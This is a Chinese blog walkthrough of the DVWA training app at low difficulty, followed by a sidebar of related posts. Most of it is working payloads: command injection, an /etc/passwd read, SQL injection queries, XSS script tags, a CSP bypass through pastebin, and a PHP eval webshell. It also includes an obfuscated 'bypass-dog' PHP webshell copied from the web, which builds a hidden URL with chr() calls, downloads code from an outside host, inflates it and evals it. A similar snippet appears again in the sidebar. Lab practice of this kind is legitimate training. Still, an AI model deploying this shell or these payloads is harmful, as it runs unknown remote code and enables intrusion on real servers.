DVWA简单难度

最新推荐文章于 2023-12-14 14:02:41 发布
最新推荐文章于 2023-12-14 14:02:41 发布
阅读量419 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjb6988125/article/details/89766326
版权

目录

DVWA简单难度

Brute Force = 尝试登录成功

Burp抓包->发送到Intruder->猜测用户名为admin->用字典爆破
得到密码password
在这里插入图片描述

Command Injection = 尝试在服务器上列根目录

输入127.0.0.1&&ls /

File Inclusion = 尝试读取到服务器的密码

输入etc/passwd
得到

root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
然后不会了。。

File Upload = 上传一个PHP木马,并连接成功

上传一句话木马<?php eval($_POST['aa']);?>
访问https://sqli-lab.practice.rois.io/hackable/uploads/1.php
在这里插入图片描述用菜刀无法连接总是出现500
百度找过狗一句话
最后找到一个可以用的

 <?php

$password='myhack58';//登录密码(支持菜刀)

//----------功能程序------------------//

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?>

在这里插入图片描述

SQL Injection = 尝试拿到当前表名

依次输入
1’ union select 1,database()#
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
得到表名 guestbook,users
在这里插入图片描述

SQL Injection (Blind) = 尝试拿到当前数据库名

1.输入1’ and length(database())>4#提示不存在
输入1’ and length(database())>3#存在,所以数据库名的长度为4
2.然后用1’ and ascii(substr(database(),n,1))>100#来获得数据库名
3.最后得到数据库名为dvwa

XSS (DOM) = 尝试弹一个对话框

在这里插入图片描述
查看源代码发现上述位置可以进行XSS攻击
访问https://sqli-lab.practice.rois.io/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(0)%3C/script%3E 即可
在这里插入图片描述

XSS (Reflected) = 尝试弹一个对话框

在这里插入图片描述
输入直接输入<script>alert(0)</script>即可
在这里插入图片描述

XSS (Stored) = 尝试弹一个对话框

在这里插入图片描述直接输入<script>alert(0)</script>即可
在这里插入图片描述

CSP Bypass = 尝试弹一个对话框

查看源代码
Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;

发现可以加载https://pastebin.com中的script
去https://pastebin.com发布alert(1)
在输入框中填入https://pastebin.com/raw/HLLRVw2F
成功弹出一个对话框
在这里插入图片描述

JavaScript = 尝试拿到正确的Token

提交success发现提示错误的token
看源代码发现token是在前台生成的所以只要输入success在执行一次generate_token()就可以了
在这里插入图片描述token=38581812b435834ebf84ebcc2c6424d6

ccreater
关注
dvwa-简单
lwbcsd的博客
01-25 789
Brute Force(Low) 从页面中可以看出这是一个输入账户和密码题。 方法一 用burp进行暴力破解 方法二 看页面是否有sql注入,显然这个页面是存在sql注入的。
20201225DVWA暴力破解(Brute Force)模块全难度详解
qq_45290991的博客
12-30 682
一、low级别 low级别直接用BP爆破就好了,先看源码: Brute Force Source vulnerabilities/brute/source/low.php <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5(
Dvwa的低难度通关
h0ld1rs的博客
07-31 499
目录搭建低难度通关brute forceCommand InjectionCSRFFile InclusionFile Upload 搭建 使用docker搭建 docker search dvwa docker pull xxx docker run xxx 详细说一下搭建后的情况 低难度通关 搭建好后想先看一下源代码的,然后发现有这么多种php文件,应该是说的表示难度难度的选择在这里更改 brute force 查看low.php的源代码 发现没有任何的防御手段,我们直接用burp抓包,进
dvwa通关(初级)
weixin_63154145的博客
02-07 227
dvwa通关(初级)
DVWA Brute Force(low)
tb_youth的博客
12-07 339
0x00 设置安全水平 小白刚接触DVWA,先从简单的开始 00x1 Brute Force(蛮力:爆破) 0x02 开启firefox代理 首选项 0x03 使用brupsuite爆破 输入: admin 123456 点击登入 在http history中找到目标,然后将它送至爆破页 转到爆破页: 设置爆破参数,这里只需要设置两个爆破参数 一个是username,另一个是passwor...
dvwa brute force(暴力破解)
一个安全研究员
04-26 2636
介绍 暴力破解其实没有什么神秘的,也是大家都有的一个四位方式,比如说我们有时候会忘记我们的手机密码,这个时候我们就会从我们之前使用的密码中一个个去试着解锁,这就是暴力破解的精髓所在了,也就是枚举猜解。所以暴力破解的前提就是你有一个强大的字典,字典就是我们已知的一些用户名和密码,我们会通过这个字典来猜解。 low 方法一: 我们可以直接使用burpsuite的intruder模块进行暴力...
十三、kali windows DVWA搭建及测试
最新发布
01-15
4. Impossible级别,虽然难度最大,但某些情况下仍有可能通过特殊的命令构造执行。 在每个级别,都要记得检查源代码,理解防御机制的工作原理以及如何绕过它。 通过这个过程,我们可以深入理解命令执行漏洞的危害...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
每个漏洞都有不同的难度级别,适合不同程度的学习者。 SQL-li-labs则专注于SQL注入,这是Web应用程序中最常见且危险的一种安全问题。在SQL-li-labs中,用户可以通过尝试输入特定的查询字符串来触发注入,从而获取未...
DVWA-master.zip
06-09
为了运行DVWA,推荐使用wamp服务器,这是一种集成了Apache、MySQL和PHP的本地开发环境,安装简单,配置快速,非常适合搭建这样的练习平台。 【详细知识点】 1. **SQL注入**:DVWA的"SQL Injection"模块让你了解...
Web安全之DVWA入门
03-10
- **DVWA实战分析**:针对不同难度级别的漏洞(Low、Medium、High、Impossible),提供了具体的案例分析和渗透测试方法。 - **防御措施与最佳实践**:最后给出防御这些漏洞的最佳做法和建议。 #### 四、环境搭建 - ...
DVWA--Brute Force(暴力破解)
weixin_50342860的博客
08-19 189
目录风险mediumhigh修复 风险 在不知道用户的账号和密码的情况下,通过自动化工具或者强大的字典去进行连续性尝试,去碰撞出一些有效的账号密码,一般用来破解后台管理系统的登录。 medium 将DVWA的级别调为Medium后,进入Brute Force 输入一个账号与密码,使用burp进行抓包 右击发送到 intruder模块,将账号与密码设为变量,爆破模式选为Cluster bomb 在 Payloads 中,Payload set 选择使用 Simple list ,将用户字典和密码字典分别添加
DVWA 中等难度
h0ld1rs的博客
08-02 590
文章目录Brute ForceCommand InjectionCSRFFile InclusionFile UploadSQL InjectionSQL Injection (Blind)XSS (Reflected)XSS (Stored) Brute Force 相比较,多了这几行代码 然而多出来的这个函数mysql_real_escape_string( $user )就是对一些特殊字符进行了转义,在low难度下可以利用注释#,将sql语句改写。这里就不能了。这里还是可以利用burp进行强爆破。
DVWA难度(1-4)
weixin_50998641的博客
01-24 711
1.Brute Force( 暴力破解) 开始页面 Username默认为admin 直接使用burp进行爆破 所以密码就是password 输入之后跳转 第一关就OK了 需要注意的是:如果Burp代理使用火狐浏览器自带的代理,则无法抓取本地DVWA数据流量包 有两种解决方法: **一: 把本地的localhost/127.0.0.1换成本机IP ** 二:使用浏览器插件进行代理,不用浏览器本身自带的代理 2.Command Injection( 命令行注入 ) 首先需要了解命令连接符 comma
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2852
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
dvwa Brute Force(暴力破解)通关手册
lyy0xfff的博客
07-19 275
Preface 同上一篇命令执行,同样也是复习明天的考试,从而自己写一篇博客,关于暴力破解,实际上就是运用到我们的burp的intruder模块和一些密码字典来进行暴力破解密码 Main Body 0x00 我们首先打开我们的DVWA靶场 其实这个就是让我们爆破密码,我们用burp的intruder模块 假设我们已经知道用户名,只需要去猜解它的密码,我们通过抓包,然后发送到爆破模块,把密码当成变量 首先当密码不正确的时候返回的页面如下表 密码正确的时候返回 0x01 我们将将密码设置为变量 然后加载
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1312
2021年暑假参加集训,在buuctf上做的几道题的writeup.
RCTF2019web题目复现之rblog和ez4cr
kekefen01的博客
05-26 722
这两道题都是关于反射型XSS绕过。看wp还复现了蛮长时间,bot好像挂了,所以就打打自己cookie吧 rblog 1.查看所有接口地址 2.接口中的v1v2可能是版本号 发现接口地址https://rblog.2019.rctf.rois.io/api/v1/posts 这里注意: v2的Content-Type: application/json 此时浏览器不会解析插入标签 v1的Cont...
PHP后门一
qq_41750040的博客
03-28 977
<?php $admin['check'] = false; $password = 'chenff';//ÉèÖÃÃÜÂë $c = "chr"; session_start(); if (empty($_SESSION['PhpCode'])) { $url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47); $...
php超小免杀大马_php最新php大马免杀过狗最小1kB吗?
weixin_39688856的博客
12-20 218
谁知道这个php大马是什么加密的?听说可以过狗免杀过盾是真的吗?
dvwa如何更改难度
09-20
DVWA提供了不同难度的漏洞供用户练习,方便初学者逐步培养网络安全意识和技能。 要更改DVWA难度,可以按照以下步骤进行操作: 1. 打开DVWA应用程序并使用管理员帐户登录。 2. 在主菜单中,找到"环境"选项并点击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值